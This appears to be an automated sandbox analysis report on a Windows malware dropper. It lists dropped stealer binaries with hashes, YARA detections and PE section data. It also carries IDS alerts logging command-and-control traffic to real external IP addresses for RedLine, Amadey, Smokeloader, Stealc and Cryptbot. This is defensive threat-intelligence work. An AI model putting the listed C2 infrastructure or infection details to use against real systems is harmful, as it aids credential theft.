SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Users\user\AppData\Roaming\XBckuYbXje.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082156492931411
Encrypted:	false
SSDEEP:	3072:sq6EgY6iChfrUjHcQZwP7h5kQgnKyyeTAXtUSiVlcZqf7D34leqiOLibBOe:nqY6iChawPfkx7yeTAdUblcZqf7DIvL
MD5:	30F46F4476CDC27691C7FDAD1C255037
SHA1:	B53415AF5D01F8500881C06867A49A5825172E36
SHA-256:	3A8F5F6951DAD3BA415B23B35422D3C93F865146DA3CCF7849B75806E0B67CE0
SHA-512:	271AADB524E94ED1019656868A133C9E490CC6F8E4608C8A41C29EFF7C12DE972895A01F171E8F625D07994FF3B723BB308D362266F96CB20DFF82689454C78F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.9...............0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\whicctb

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	358912
Entropy (8bit):	5.978721741733768
Encrypted:	false
SSDEEP:	6144:gSVu917CQaNutVHcaOLnysBBPEDcu4jZ21sK0O:gSE91m7WSasBPu6Z2z
MD5:	D78D85135F584E455F692923D9FEB804
SHA1:	7BF6D4D00326ECFA3E48644896D3407AB473A9D5
SHA-256:	41582C8B6BD111A2F141DEE52B619D13278EF68754691263ABEB3238D485F404
SHA-512:	1FB4E040511F3BBF8C04459942D1A5915B5F8FE78DD169B932E04DC7CCDB227AEE42327A8071136B27A368F2FE8B8B5DE3C9187D4B3CC5354CBBA0A1D89D26BB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....W...W...W...W...W...W...W...W...W.W...W...Wh..W...W...W...W...W...W...WRich...W........PE..L....qOd.................\|...,......8E............@..................................k.......................................~..P.... ...............................................................1..@............................................text...6z.......\|.................. ..`.data............v..................@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wxfM3haI2K.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	557056
Entropy (8bit):	6.311657384729558
Encrypted:	false
SSDEEP:	6144:q9DfA3bgFn8PGgNryMVOa/agTyqYYlHg8q16ODfL5DAq6syp2cbYJNLhTx:q9DfW68ugNus+qgZ1zLlDly2b
MD5:	88367533C12315805C059E688E7CDFE9
SHA1:	64A107ADCBAC381C10BD9C5271C2087B7AA369EC
SHA-256:	C6FC5C06AD442526A787989BAE6CE0D32A2B15A12A41F78BACA336B6560997A9
SHA-512:	7A8C3D767D19395CE9FFEF964B0347A148E517982AFCF2FC5E45B4C524FD44EC20857F6BE722F57FF57722B952EF7B88F6249339551949B9E89CF60260F0A714
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A/................0..,...R......^J... ...`....@.. ....................................@..................................J..K....`...O........................................................................... ............... ..H............text...d... ...,.................. ..`.rsrc....O...`...P..................@..@.reloc...............~..............@..B................@J......H.......\|Z...x......<...X....)..............................................(....*..0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~s...(.....%..G~s...(.....%..H~s...(.....%..e~s...(.....~t...(.......o......8......(......s.......sK.......~....}....~...........s....(....o....}......{.....I~s...(....o........9......I~s...(.......8C........~s...(....o....:......{....~u...(....8......{....~v...(.........(...........9........o........(

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\PQ2AUndsdb.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.525339876524235
Encrypted:	false
SSDEEP:	6:jUZX2JUEZ+lX1lOJUPelkDdtcVAkXIEZ8MlW8+y0lCbqut0:jUl2JQ1lOmeeDhkXd8kX+VWqut0
MD5:	B721F88C9445ED32838B79776DFB72E0
SHA1:	5D4BCFC7BD8CF2B3A4F67C72108D28F159ADAF60
SHA-256:	1392CEBA43A137AD65E63B912055A388708A396BA6AF1731CA24CCA69C9CFAAF
SHA-512:	AEEF901117BCB964DEA8AF60AFB198D7B50C809A334EC097A0BC28705033C05486E6FECECBEE53E8C4962C1BC88FF29F5E29DA51FA0FEEB946B4B01D8BE3B6C2
Malicious:	false
Preview:	......l2.O....}.'`F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949409711445707
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PQ2AUndsdb.exe
File size:	1'901'056 bytes
MD5:	3d299133a21509bb0b005f7e18239517
SHA1:	9e9e464145f6208a62bc01a42568dbc259afbd50
SHA256:	f7b78fc6239775c67933713a1e65570e9be12c8b72a3225600112e4e40a81958
SHA512:	791cb24b622ed6eece262cbbe0c6594ff6ff2a7ec3be26d7201f260bc758378c898f9babb0657e2301fa40072bff9eb8a3958d5e7c43c37577f3b1b61a2d01cf
SSDEEP:	49152:GuuQGYpXc8ui/IepABEY1zbha5LKj5oBXI9M7+ORHA:nubKtui/rABXha5LKmIIRg
TLSH:	E295331C5F3B1192CB6E667708D29BEB30381A586B9CA37507036BED6747F8A71C648C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b3000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA0AC8249BAh
pavgb mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FA0AC8269B5h
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b14c0	0x10	rxawdntq
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b1470	0x18	rxawdntq
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	a3b6d497bb0a933e5de3ec09c6f2e044	False	0.9971155483651226	data	7.976742383146677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	c4c4f57cfc5d411231545bf0128123ed	False	0.580078125	data	4.49304414828208	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a8000	0x200	0eed0b074dcee6f9cf9d9a9d93733994	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rxawdntq	0x313000	0x19f000	0x19e800	de581e32cd139d8969aec9443537fcd0	False	0.9946241942475874	data	7.9536549363318265	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tdrtfhuo	0x4b2000	0x1000	0x400	8444ba74102f40faa9d384e5dbd122f7	False	0.7294921875	data	5.7232579406829025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b3000	0x3000	0x2200	0a479043d395425ba46fd0eeda86808d	False	0.06112132352941176	DOS executable (COM)	0.785446649271788	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b14d0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-26T23:29:28.063888+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:22.844974+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:16.131320+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:16.131320+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:25.018784+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:28.307381+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:24.590179+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:56.281209+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49768	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:24.864456+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:26.501859+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:26.776231+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:29.492796+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:44.026633+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49741	80	192.168.2.7	195.133.48.136
2024-08-26T23:29:28.000626+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:25.072513+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:31.323400+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:42.700639+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49742	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:11.284368+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49724	80	192.168.2.7	185.215.113.16
2024-08-26T23:30:01.845118+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49778	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:22.604211+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:31.721092+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49740	80	192.168.2.7	185.215.113.16
2024-08-26T23:30:04.074869+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49781	80	192.168.2.7	46.100.50.5
2024-08-26T23:30:04.074869+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49781	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:24.792974+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:21.231670+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:17.043719+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	45580	49729	65.21.18.51	192.168.2.7
2024-08-26T23:29:17.171446+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49730	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:22.122458+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	29257	49728	95.179.163.21	192.168.2.7
2024-08-26T23:29:58.485468+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49772	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:58.485468+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49772	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:19.513258+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:23.692597+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:30:05.185326+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49783	80	192.168.2.7	46.100.50.5
2024-08-26T23:30:05.185326+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49783	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:08.977468+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49723	185.215.113.16	192.168.2.7
2024-08-26T23:29:27.966270+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:31.975646+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49740	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:48.457245+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49753	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:26.523924+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49738	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:19.899040+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49733	185.215.113.17	192.168.2.7
2024-08-26T23:29:16.321261+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	29257	49728	95.179.163.21	192.168.2.7
2024-08-26T23:29:22.655054+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	45580	49729	65.21.18.51	192.168.2.7
2024-08-26T23:29:28.824533+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:47.367293+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49747	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:47.367293+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49747	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:28.283550+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:16.922402+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49730	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:27.873296+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:24.364401+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:21.378364+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:22.183729+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:22.648788+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:30:00.735303+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49776	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:25.895364+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:27.525890+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:30:02.960203+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49779	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:27.084431+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:26.767811+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49738	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:08.695889+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49723	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:39.406305+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49741	80	192.168.2.7	195.133.48.136
2024-08-26T23:29:26.583502+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:19.398310+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49734	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:29.397605+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49739	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:28.698663+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:30:07.641514+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49787	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:29.641610+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49739	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:51.753248+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49760	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:51.753248+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49760	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:14.224074+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49725	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:25.275879+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:59.611044+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49774	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:31.946147+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:22.316164+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:26.092719+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:28.901663+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:23.860996+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:42.456256+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49742	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:16.842296+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:16.842296+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:23.042504+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:26.177860+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:23.476935+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:54.066485+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49764	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:35.527199+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49741	80	192.168.2.7	195.133.48.136
2024-08-26T23:30:06.273434+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49785	80	192.168.2.7	46.100.50.5
2024-08-26T23:30:06.273434+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49785	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:23.669554+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:29.190276+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:57.401107+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49770	80	192.168.2.7	46.100.50.5
